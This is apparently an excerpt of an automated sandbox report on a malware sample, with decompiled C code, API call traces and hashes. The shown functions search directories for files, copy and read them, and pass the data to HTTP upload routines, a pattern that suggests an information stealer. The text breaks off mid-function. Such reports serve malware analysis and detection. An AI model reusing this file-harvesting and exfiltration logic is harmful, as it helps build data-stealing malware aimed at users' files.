Part of subcall function 00403907: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00403957
Part of subcall function 00403907: InternetCrackUrlA.WININET(000000FF,00000000), ref: 0040395F

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004039F0
StrCmpCA.SHLWAPI(?), ref: 00403A08
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403B34
lstrlen.KERNEL32(?,00411BE1,",00413FCC,------,00413FCC,",00413FCC,------), ref: 00403D96
lstrlen.KERNEL32(?,?,00000000), ref: 00403DA3
HttpSendRequestA.WININET(?,?,00000000), ref: 00403DB1
InternetReadFile.WININET(?,?,000007CF,?), ref: 00403DFC
InternetCloseHandle.WININET(?), ref: 00403E07
InternetCloseHandle.WININET(?), ref: 00403E18
InternetCloseHandle.WININET(?), ref: 00403E21
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00403B6F

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

Strings

", xrefs: 00403C1D, 00403D1B
------, xrefs: 00403A6E, 00403B80, 00403C7B

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandlemalloc$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$------
API String ID: 1813609094-2370822465
Opcode ID: 07de19e2fcea448f3aea4e5336e59603872bf81c95d9036a3fec854781759e2e
Instruction ID: 2e1fcce4d814bb13d3c73c300ea91ae1828b15e443333a6f255927eb57f1600a
Opcode Fuzzy Hash: 07de19e2fcea448f3aea4e5336e59603872bf81c95d9036a3fec854781759e2e
Instruction Fuzzy Hash: 1AF19432D0011EEBCF10FBA6DC469DDBB79EF04308F11816AE615B7161D7796E868B88

Uniqueness

Uniqueness Score: -1.00%

Function 0040B62A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 132
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E0040B62A(intOrPtr _a4, intOrPtr _a8, char _a12) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				char _v20;
				char _v32;
				char _v300;
				char _v564;
				char _v828;
				struct _WIN32_FIND_DATAA _v1148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t55;
				void* _t66;
				void* _t89;
				void* _t130;
				void* _t131;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;

				wsprintfA( &_v828, "%s\\%s", _a4, _a8);
				_t131 = _t130 + 0x10;
				_t55 = FindFirstFileA( &_v828,  &_v1148); // executed
				_v16 = _t55;
				if(_t55 == 0xffffffff) {
					L8:
					return E004016CC( &_a12);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(0x411bf0);
					_push( &(_v1148.cFileName));
					if( *0x615784() != 0) {
						_t66 =  *0x615784( &(_v1148.cFileName), 0x411bf4);
						_t142 = _t66;
						if(_t66 != 0) {
							_v8 =  &_v564;
							memset(_v8, 0, 0x104 << 0);
							_v8 =  &_v300;
							memset(_v8, 0, 0x104 << 0);
							 *0x61575c( &_v564,  *0x615454);
							 *0x61575c( &_v564,  *0x615340);
							 *0x61575c( &_v564,  &(_v1148.cFileName));
							 *0x61575c( &_v300, _a4);
							 *0x61575c( &_v300, 0x411be4);
							 *0x61575c( &(_v1148.cFileName));
							_t135 = _t131 + 0x18 - 0xc;
							E004100ED(_t135, _t142,  &_v300);
							_t89 = E00405394( &_v12,  &_v20,  &_v300);
							_t136 = _t135 + 0xc;
							_t143 = _t89;
							if(_t89 != 0) {
								_push(_v20);
								_push(_v12);
								_t138 = _t136 - 0xc;
								E004100ED(_t138, _t143,  &_v564);
								_t139 = _t138 - 0x50;
								E004016EB( &_a12, _t139);
								_push( &_v32);
								E00403F95(0, _t143);
								_t136 = _t139 + 0x68;
								E00401859(_v32);
							}
							_v8 =  &_v564;
							memset(_v8, 0, 0x104 << 0);
							_v8 =  &_v300;
							memset(_v8, 0, 0x104 << 0);
							_t131 = _t136 + 0x18;
						}
					}
				} while (FindNextFileA(_v16,  &_v1148) != 0);
				FindClose(_v16);
				_v12 =  &_v828;
				memset(_v12, 0, 0x104 << 0);
				goto L8;
			}

0x0040b648
0x0040b64e
0x0040b65f
0x0040b665
0x0040b66b
0x0040b7fa
0x0040b806
0x00000000
0x00000000
0x00000000
0x0040b671
0x0040b671
0x0040b671
0x0040b67c
0x0040b685
0x0040b697
0x0040b69d
0x0040b69f
0x0040b6ab
0x0040b6b8
0x0040b6c0
0x0040b6cd
0x0040b6dc
0x0040b6ef
0x0040b703
0x0040b713
0x0040b725
0x0040b739
0x0040b73f
0x0040b74b
0x0040b756
0x0040b75b
0x0040b75e
0x0040b760
0x0040b762
0x0040b76b
0x0040b76e
0x0040b774
0x0040b779
0x0040b781
0x0040b789
0x0040b78a
0x0040b792
0x0040b795
0x0040b795
0x0040b7a0
0x0040b7ad
0x0040b7b5
0x0040b7c2
0x0040b7c2
0x0040b7c2
0x0040b69f
0x0040b7d4
0x0040b7df
0x0040b7eb
0x0040b7f8
0x00000000

APIs

wsprintfA.USER32 ref: 0040B648
FindFirstFileA.KERNEL32(?,?), ref: 0040B65F
StrCmpCA.SHLWAPI(?,00411BF0), ref: 0040B67D
StrCmpCA.SHLWAPI(?,00411BF4), ref: 0040B697
lstrcat.KERNEL32(?), ref: 0040B6DC
lstrcat.KERNEL32(?), ref: 0040B6EF
lstrcat.KERNEL32(?,?), ref: 0040B703
lstrcat.KERNEL32(?,0040B8D6), ref: 0040B713
lstrcat.KERNEL32(?,00411BE4), ref: 0040B725
lstrcat.KERNEL32(?,?), ref: 0040B739

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00405394: CreateFileA.KERNEL32(cd@,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053AF
Part of subcall function 00405394: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053C6
Part of subcall function 00405394: LocalAlloc.KERNEL32(00000040,?,?,?,?,00406463,?,?,?,?), ref: 004053DD
Part of subcall function 00405394: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00406463,?,?,?,?), ref: 004053F4
Part of subcall function 00405394: FindCloseChangeNotification.KERNEL32(?,?,?,?,00406463,?,?,?,?), ref: 0040541C

Part of subcall function 00403F95: lstrlen.KERNEL32(?), ref: 00403FEE
Part of subcall function 00403F95: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040403D
Part of subcall function 00403F95: StrCmpCA.SHLWAPI(?), ref: 00404052

FindNextFileA.KERNEL32(?,?), ref: 0040B7CE
FindClose.KERNEL32(?), ref: 0040B7DF

Strings

%s\%s, xrefs: 0040B642

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$File$Find$Close$AllocChangeCreateFirstInternetLocalNextNotificationOpenReadSizelstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 1635275004-4073750446
Opcode ID: 354ace3a186bab90fcc4e0ff18bffbd61e128c35cf7f42d562c3064489dc239c
Instruction ID: 4666e02992b4cbac1f89d50f2f7ef65daacfc0994eea341b0029b3827b367913
Opcode Fuzzy Hash: 354ace3a186bab90fcc4e0ff18bffbd61e128c35cf7f42d562c3064489dc239c
Instruction Fuzzy Hash: FA510C7191021DEBCF50DBA4DC89ACEBBBDEB48314F0444A6E609E3250EB349B99CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406BD7 Relevance: 18.4, APIs: 12, Instructions: 382
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00406BD7(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, intOrPtr _a40, intOrPtr _a44, int _a48, int _a52, char _a56) {
				CHAR* _v12;
				CHAR* _v20;
				signed int _v24;
				CHAR* _v32;
				CHAR* _v36;
				void* _v44;
				void* _v48;
				CHAR* _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				char _v120;
				char _v132;
				char _v144;
				char _v156;
				char _v168;
				char _v180;
				char _v192;
				char _v204;
				char _v216;
				char _v228;
				struct _WIN32_FIND_DATAA _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t152;
				int _t169;
				void* _t172;
				intOrPtr _t198;
				void* _t201;
				int _t206;
				void* _t237;
				CHAR** _t272;
				void* _t302;
				void* _t311;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t398;
				void* _t399;
				void* _t400;
				void* _t401;

				_t402 = __eflags;
				_t311 = __ecx;
				_t302 = 0x411be1;
				E004100ED( &_v60, __eflags, 0x411be1);
				E0041018C(E00410208(E004101C6( &_v60, _t311,  &_a16,  &_v32, __eflags), _t311,  &_v44, __eflags, "\\*"), _t311,  &_v60);
				E00401859(_v44);
				E00401859(_v32);
				E004100ED( &_v20, _t402, 0x411be1);
				E004100ED( &_v44, _t402, 0x411be1);
				_t152 = FindFirstFileA(_v60,  &_v552); // executed
				_v48 = _t152;
				if(_t152 == 0xffffffff) {
					L27:
					E00401859(_v44);
					E00401859(_v20);
					E00401859(_v60);
					E00401859(_a4);
					E00401859(_a16);
					E00401859(_a28);
					return E004016CC( &_a56);
				} else {
					goto L1;
				}
				do {
					L1:
					_push(0x411bf0);
					_push( &(_v552.cFileName));
					if( *0x615784() == 0) {
						goto L25;
					}
					_t172 =  *0x615784( &(_v552.cFileName), 0x411bf4);
					_t405 = _t172;
					if(_t172 == 0) {
						goto L25;
					}
					E00410148(_t311,  &_v20, _t302);
					E0041018C(E00410208(E00410208(E004101C6( &_v20, _t311,  &_a16,  &_v108, _t405), _t311,  &_v204, _t405, 0x411be4), _t311,  &_v132, _t405,  &(_v552.cFileName)), _t311,  &_v20);
					E00401859(_v132);
					E00401859(_v204);
					E00401859(_v108);
					_push( *0x615030);
					_push(0x411be4);
					_push( *0x615458);
					_push(0x411be4);
					_t406 = _a48;
					if(_a48 == 0) {
						E0041018C(E00410208(E00410208(E00410208(E00410208( &_v20, _t311,  &_v144, __eflags), _t311,  &_v120, __eflags), _t311,  &_v96, __eflags), _t311,  &_v84, __eflags), _t311,  &_v44);
						E00401859(_v84);
						E00401859(_v96);
						E00401859(_v120);
						_t198 = _v144;
					} else {
						E0041018C(E00410208(E00410208(E00410208(E00410208( &_a16, _t311,  &_v156, _t406), _t311,  &_v228, _t406), _t311,  &_v72, _t406), _t311,  &_v180, _t406), _t311,  &_v44);
						E00401859(_v180);
						E00401859(_v72);
						E00401859(_v228);
						_t198 = _v156;
					}
					E00401859(_t198);
					_t201 =  *0x615784( &(_v552.cFileName),  *0x6153b8);
					_t407 = _t201;
					if(_t201 != 0) {
						__eflags =  *0x615784( &(_v552.cFileName),  *0x615030);
						if(__eflags != 0) {
							_t375 = _t374 - 0xc;
							E0041011F( &_v44, _t311, _t375, __eflags); // executed
							_t206 = E0040EFB9(); // executed
							_t374 = _t375 + 0xc;
							__eflags = _t206;
							if(_t206 == 0) {
								__eflags =  *0x615784( &(_v552.cFileName),  *0x6153fc);
								if(__eflags != 0) {
									__eflags =  *0x615784( &(_v552.cFileName),  *0x61526c);
									if(__eflags == 0) {
										_push(_a48);
										_t388 = _t374 - 0x50;
										E004016EB( &_a56, _t388);
										_t389 = _t388 - 0xc;
										E0041011F( &_a28, _t311, _t389, __eflags);
										_t390 = _t389 - 0xc;
										E0041011F( &_a4, _t311, _t390, __eflags);
										_t391 = _t390 - 0xc;
										E0041011F( &_v20, _t311, _t391, __eflags); // executed
										E00406505(_t311, __eflags); // executed
										_t374 = _t391 + 0x78;
									}
								} else {
									E004100ED( &_v32, __eflags, 0x411be1);
									E0041018C(E00410208( &_v32, _t311,  &_v168, __eflags,  *0x6153e4), _t311,  &_v32);
									E00401859(_v168);
									_t237 = E0040EEA9(0x411be4,  &_v216, __eflags, 8);
									_pop(_t311);
									E0041018C(E004101C6( &_v32, _t311, _t237,  &_v192, __eflags), _t311,  &_v32);
									E00401859(_v192);
									E00401859(_v216);
									CopyFileA(_v20, _v32, 1); // executed
									_push(_a48);
									_t392 = _t374 - 0x50;
									E004016EB( &_a56, _t392);
									_t393 = _t392 - 0xc;
									E0041011F( &_a28, _t311, _t393, __eflags);
									_t394 = _t393 - 0xc;
									E0041011F( &_a4, _t311, _t394, __eflags);
									_t395 = _t394 - 0xc;
									E0041011F( &_v32, _t311, _t395, __eflags); // executed
									E0040613C(_t311, __eflags); // executed
									_t396 = _t395 + 0x28;
									E004016EB( &_a56, _t396);
									_push(_a48);
									_push(_a44);
									_push(_a40);
									_t397 = _t396 - 0xc;
									E0041011F( &_a28, _t311, _t397, __eflags);
									_t398 = _t397 - 0xc;
									E0041011F( &_a4, _t311, _t398, __eflags);
									_t399 = _t398 - 0xc;
									E0041011F( &_v32, _t311, _t399, __eflags); // executed
									E00406736(_t311, __eflags); // executed
									_t374 = _t399 + 0x80;
									DeleteFileA(_v32); // executed
									E00401859(_v32);
									_v32 = _v32 & 0x00000000;
									_v24 = _v24 & 0x00000000;
									E00401859(0);
								}
								goto L22;
							}
							__eflags = _a48;
							if(__eflags == 0) {
								_t400 = _t374 - 0x50;
								E004016EB( &_a56, _t400);
								_push(0);
								L16:
								_push(_a44);
								_push(_a40);
								_t401 = _t400 - 0xc;
								E0041011F( &_a28, _t311, _t401, __eflags);
								_t382 = _t401 - 0xc;
								E004100ED(_t382, __eflags,  &(_v552.cFileName));
								_t272 =  &_v44;
								L17:
								_t383 = _t382 - 0xc;
								E0041011F(_t272, _t311, _t383, __eflags); // executed
								E00405C8D(_t311, __eflags); // executed
								_t374 = _t383 + 0x80;
								goto L22;
							}
							__eflags = _a52;
							if(__eflags != 0) {
								goto L22;
							}
							_t400 = _t374 - 0x50;
							_a52 = 1;
							E004016EB( &_a56, _t400);
							_push(_a48);
							goto L16;
						}
						__eflags =  *0x615784(_a4,  *0x615458);
						if(__eflags == 0) {
							goto L22;
						}
						_t380 = _t374 - 0x50;
						E004016EB( &_a56, _t380);
						_push(_a48);
						_push(_a44);
						_push(_a40);
						_t381 = _t380 - 0xc;
						E0041011F( &_a28, _t311, _t381, __eflags);
						_t382 = _t381 - 0xc;
						E0041011F( &_a4, _t311, _t382, __eflags);
						_t272 =  &_v20;
						goto L17;
					} else {
						_t384 = _t374 - 0x50;
						E004016EB( &_a56, _t384);
						_push(_a44);
						_push(_a40);
						_t385 = _t384 - 0xc;
						E0041011F( &_a28, _t311, _t385, _t407);
						_t386 = _t385 - 0xc;
						E0041011F( &_v20, _t311, _t386, _t407);
						_t387 = _t386 - 0xc;
						E0041011F( &_a4, _t311, _t387, _t407); // executed
						E004058A0(_t311, _t407); // executed
						_t374 = _t387 + 0x7c;
						L22:
						_t408 = _v552.dwFileAttributes & 0x00000010;
						if((_v552.dwFileAttributes & 0x00000010) != 0) {
							_t376 = _t374 - 0x50;
							E004016EB( &_a56, _t376);
							_push(_a52);
							_push(_a48);
							_push(_a44);
							_push(_a40);
							_t377 = _t376 - 0xc;
							E0041011F( &_a28, _t311, _t377, _t408);
							_t378 = _t377 - 0xc;
							E0041011F( &_v20, _t311, _t378, _t408);
							_t379 = _t378 - 0xc;
							E004100ED(_t379, _t408,  &(_v552.cFileName)); // executed
							E00406BD7(_t311, _t408); // executed
							_t374 = _t379 + 0x84;
						}
						E00401859(_v20);
						_v20 = 0;
						_v12 = 0;
						E00401859(_v44);
						_v44 = 0;
						_v36 = 0;
						_t302 = 0x411be1;
					}
					L25:
					_t169 = FindNextFileA(_v48,  &_v552); // executed
				} while (_t169 != 0);
				FindClose(_v48); // executed
				goto L27;
			}

0x00406bd7
0x00406bd7
0x00406be3
0x00406bec
0x00406c0f
0x00406c17
0x00406c1f
0x00406c28
0x00406c31
0x00406c40
0x00406c46
0x00406c4c
0x0040711f
0x00407122
0x0040712a
0x00407132
0x0040713a
0x00407142
0x0040714a
0x0040715b
0x00000000
0x00000000
0x00000000
0x00406c52
0x00406c52
0x00406c52
0x00406c5d
0x00406c66
0x00000000
0x00000000
0x00406c78
0x00406c7e
0x00406c80
0x00000000
0x00000000
0x00406c8a
0x00406cc0
0x00406cc8
0x00406cd3
0x00406cdb
0x00406ce0
0x00406ce8
0x00406ce9
0x00406cef
0x00406cf0
0x00406cf3
0x00406d78
0x00406d80
0x00406d88
0x00406d90
0x00406d95
0x00406cf5
0x00406d24
0x00406d2f
0x00406d37
0x00406d42
0x00406d47
0x00406d47
0x00406d9b
0x00406dad
0x00406db3
0x00406db5
0x00406e11
0x00406e13
0x00406e61
0x00406e69
0x00406e6e
0x00406e73
0x00406e76
0x00406e78
0x00406f04
0x00406f06
0x00407040
0x00407042
0x00407044
0x0040704a
0x0040704f
0x00407054
0x0040705c
0x00407061
0x00407069
0x0040706e
0x00407076
0x0040707b
0x00407080
0x00407080
0x00406f0c
0x00406f14
0x00406f30
0x00406f3b
0x00406f48
0x00406f4f
0x00406f61
0x00406f6c
0x00406f77
0x00406f84
0x00406f8a
0x00406f90
0x00406f95
0x00406f9a
0x00406fa2
0x00406fa7
0x00406faf
0x00406fb4
0x00406fbc
0x00406fc1
0x00406fc6
0x00406fcb
0x00406fd0
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe1
0x00406fe6
0x00406fee
0x00406ff3
0x00406ffb
0x00407000
0x00407005
0x0040700e
0x00407017
0x0040701c
0x00407020
0x00407026
0x00407026
0x00000000
0x00406f06
0x00406e7a
0x00406e7d
0x00406ea1
0x00406ea9
0x00406eae
0x00406eb0
0x00406eb0
0x00406eb6
0x00406eb9
0x00406ebe
0x00406ec3
0x00406ecf
0x00406ed4
0x00406ed7
0x00406ed7
0x00406edc
0x00406ee1
0x00406ee6
0x00000000
0x00406ee6
0x00406e7f
0x00406e82
0x00000000
0x00000000
0x00406e88
0x00406e90
0x00406e97
0x00406e9c
0x00000000
0x00406e9c
0x00406e24
0x00406e26
0x00000000
0x00000000
0x00406e2c
0x00406e34
0x00406e39
0x00406e3f
0x00406e42
0x00406e45
0x00406e4a
0x00406e4f
0x00406e57
0x00406e5c
0x00000000
0x00406db7
0x00406db7
0x00406dbf
0x00406dc4
0x00406dca
0x00406dcd
0x00406dd2
0x00406dd7
0x00406ddf
0x00406de4
0x00406dec
0x00406df1
0x00406df6
0x00407083
0x00407083
0x0040708a
0x0040708c
0x00407094
0x00407099
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ad
0x004070b2
0x004070ba
0x004070bf
0x004070cb
0x004070d0
0x004070d5
0x004070d5
0x004070de
0x004070e8
0x004070eb
0x004070ee
0x004070f3
0x004070f6
0x004070f9
0x004070f9
0x004070fe
0x00407108
0x0040710e
0x00407119
0x00000000

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

FindFirstFileA.KERNEL32(?,?,00411BE1,00411BE1,00414064,00411BE1,?,?,?), ref: 00406C40
StrCmpCA.SHLWAPI(?,00411BF0,?,?,?), ref: 00406C5E
StrCmpCA.SHLWAPI(?,00411BF4,?,?,?), ref: 00406C78

Part of subcall function 00410148: lstrlen.KERNEL32(?,?,0040D27A,00411BE1,00411BE1,76636410,1852,00411C74,?,0040E6D0), ref: 0041014E
Part of subcall function 00410148: lstrcpy.KERNEL32(00000000,00000000), ref: 00410180

StrCmpCA.SHLWAPI(?,00411BE4,00411BE4,00411BE4,?,00411BE1,?,?,?), ref: 00406DAD
StrCmpCA.SHLWAPI(?,?,?,?), ref: 00406E0B
StrCmpCA.SHLWAPI(00409175,?,?,?), ref: 00406E1E

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

StrCmpCA.SHLWAPI(?), ref: 00406EFE
StrCmpCA.SHLWAPI(?), ref: 0040703A

Part of subcall function 0040EEA9: GetSystemTime.KERNEL32(?,00411BE1,00000000,?,?,?,?,?,?,?,00403A28,00000014), ref: 0040EECE

CopyFileA.KERNEL32(?,?,00000001), ref: 00406F84

Part of subcall function 0040613C: lstrlen.KERNEL32(?), ref: 00406332
Part of subcall function 0040613C: lstrlen.KERNEL32(?), ref: 00406340

DeleteFileA.KERNEL32(?), ref: 0040700E
FindNextFileA.KERNEL32(?,?,?,?,?), ref: 00407108
FindClose.KERNEL32(?,?,?,?), ref: 00407119

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$Filelstrlen$Find$lstrcat$CloseCopyDeleteFirstNextSystemTime
String ID:
API String ID: 2507765261-0
Opcode ID: 14fef98c9cdcea7bc1719c3c3f6c57b898c4fdf31b6d9c3be3c223a73ee8187a
Instruction ID: 02e95719e323bd10498ff9c1c72d5569b634c8c963857da6a397ff154cb3183c
Opcode Fuzzy Hash: 14fef98c9cdcea7bc1719c3c3f6c57b898c4fdf31b6d9c3be3c223a73ee8187a
Instruction Fuzzy Hash: ADE15932D00119ABCF50FBA5DC46ACD7779AF04308F45417BF915B31A1DB78AE898B89

Uniqueness

Uniqueness Score: -1.00%

Function 0040117A Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 347
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040117A(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, int _a40, char _a44) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				CHAR* _v28;
				char _v32;
				CHAR* _v44;
				char _v56;
				void* _v60;
				CHAR* _v72;
				char _v76;
				char _v88;
				void* _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v224;
				char _v236;
				char _v248;
				char _v260;
				char _v272;
				char _v284;
				char _v296;
				char _v308;
				char _v320;
				char _v332;
				char _v344;
				char _v356;
				char _v368;
				struct _WIN32_FIND_DATAA _v692;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t149;
				void* _t151;
				char _t173;
				void* _t176;
				int _t178;
				int _t180;
				intOrPtr _t188;
				intOrPtr _t217;
				int _t221;
				void* _t230;
				char* _t241;
				intOrPtr _t244;
				void* _t247;
				int _t261;
				void* _t327;
				void* _t332;
				char* _t335;
				char* _t353;
				char* _t374;
				void* _t403;
				void* _t404;
				void* _t405;
				void* _t406;
				void* _t407;
				void* _t408;

				_t409 = __eflags;
				_t327 = 0x411be1;
				E004100ED( &_v56, __eflags, 0x411be1);
				E004100ED( &_v72, __eflags, 0x411be1);
				_t149 = E0040EFE3( &_v28, 0x1a);
				_pop(_t331);
				_t151 = E004101C6( &_v56, _t331, _t149,  &_v44, _t409);
				_t353 =  &_v56;
				E0041018C(_t151, _t331, _t353);
				E00401859(_v44);
				E00401859(_v28);
				_t410 = _a40;
				_t335 = _t353;
				if(_a40 == 0) {
					E0041018C(E004101C6(E00410208(E004101C6(E00410208(E004101C6( &_v72, _t331, _t335,  &_v104, __eflags), _t331,  &_v16, __eflags, 0x411be4), _t331,  &_a4,  &_v28, __eflags), _t331,  &_v44, __eflags, 0x411be4), _t331,  &_a28,  &_v88, __eflags), _t331,  &_v72);
					E00401859(_v88);
					E00401859(_v44);
					E00401859(_v28);
					E00401859(_v16);
					_t173 = _v104;
				} else {
					E0041018C(E00410208(E004101C6(E00410208(E004101C6( &_v72, _t331, _t335,  &_v88, _t410), _t331,  &_v16, _t410, 0x411be4), _t331,  &_a4,  &_v28, _t410), _t331,  &_v44, _t410, "\*.*"), _t331,  &_v72);
					E00401859(_v44);
					E00401859(_v28);
					E00401859(_v16);
					_t173 = _v88;
				}
				E00401859(_t173);
				_t176 = FindFirstFileA(_v72,  &_v692); // executed
				_v60 = _t176;
				if(_t176 != 0xffffffff) {
					do {
						_t178 =  *0x615784( &(_v692.cFileName), 0x411bf0);
						__eflags = _t178;
						if(_t178 != 0) {
							__eflags =  *0x615784( &(_v692.cFileName), 0x411bf4);
							if(__eflags != 0) {
								E004100ED( &_v44, __eflags, _t327);
								__eflags = _a40;
								if(__eflags == 0) {
									E0041018C(E00410208(E00410208(E004101C6(E00410208(E004101C6( &_v44, _t331,  &_v56,  &_v344, __eflags), _t331,  &_v224, __eflags, 0x411be4), _t331,  &_a4,  &_v296, __eflags), _t331,  &_v200, __eflags, 0x411be4), _t331,  &_v116, __eflags,  &(_v692.cFileName)), _t331,  &_v44);
									E00401859(_v116);
									E00401859(_v200);
									E00401859(_v296);
									E00401859(_v224);
									_t217 = _v344;
								} else {
									_t331 =  &(_v692.cFileName);
									E0041018C(E004101C6(E00410208(E00410208(E00410208(E004101C6(E00410208(E004101C6( &_v44,  &(_v692.cFileName),  &_v56,  &_v176, __eflags),  &(_v692.cFileName),  &_v272, __eflags, 0x411be4),  &(_v692.cFileName),  &_a4,  &_v152, __eflags), _t331,  &_v320, __eflags, 0x411be4), _t331,  &_v368, __eflags,  &(_v692.cFileName)), _t331,  &_v88, __eflags, 0x411be4), _t331,  &_a28,  &_v104, __eflags), _t331,  &_v44);
									E00401859(_v104);
									E00401859(_v88);
									E00401859(_v368);
									E00401859(_v320);
									E00401859(_v152);
									E00401859(_v272);
									_t217 = _v176;
								}
								E00401859(_t217);
								_t404 = _t403 - 0xc;
								E0041011F( &_v44, _t331, _t404, __eflags);
								_t221 = E0040EFB9();
								_t403 = _t404 + 0xc;
								__eflags = _t221;
								if(__eflags != 0) {
									E004100ED( &_v16, __eflags, _t327);
									_t230 = E00410208(E004101C6(E00410208(E00410208( &_v16, _t331,  &_v164, __eflags,  *0x615144), _t331,  &_v140, __eflags, 0x411be4), _t331,  &_a16,  &_v128, __eflags), _t331,  &_v248, __eflags, 0x411be4);
									_t374 =  &_v16;
									E0041018C(_t230, _t331, _t374);
									E00401859(_v248);
									E00401859(_v128);
									E00401859(_v140);
									E00401859(_v164);
									__eflags = _a40;
									_push( &(_v692.cFileName));
									_t241 = _t374;
									if(__eflags == 0) {
